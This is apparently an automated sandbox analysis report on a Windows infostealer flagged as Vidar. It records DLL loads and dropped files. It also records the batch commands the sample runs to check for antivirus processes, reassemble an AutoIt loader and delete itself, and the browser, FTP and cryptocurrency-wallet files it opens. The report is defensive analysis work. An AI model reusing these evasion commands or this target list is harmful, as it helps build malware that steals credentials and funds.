    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wsock32.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: mpr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: napinsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: pnrpnsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wshbth.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: nlaapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: winrnr.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: windows.fileexplorer.common.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: ntshrui.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: cscapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: linkinfo.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: CenteredDealing.exeStatic file information: File size 1203969 > 1048576
    Source: CenteredDealing.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: CenteredDealing.exeStatic PE information: real checksum: 0x12b4fa should be: 0x1326f4

    Persistence and Installation Behavior

    barindex
    Drops PE files with a suspicious file extension
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comJump to dropped file
    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comJump to dropped file
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\timeout.exe TID: 6492Thread sleep count: 89 > 30Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeAPI call chain: ExitProcess graph end nodegraph_0-3677
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208639Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DodgeJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Borough" Architecture Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson dJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Rip.com dJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8ycbs" & exitJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
    Source: Rip.com, 0000000C.00000000.1708036817.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp, Bridal.8.dr, Rip.com.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406805

    Stealing of Sensitive Information

    barindex
    Yara detected Vidar stealer
    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.dbJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.dbJump to behavior
    Tries to harvest and steal ftp login credentials
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
    Tries to steal Crypto Currency Wallets
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
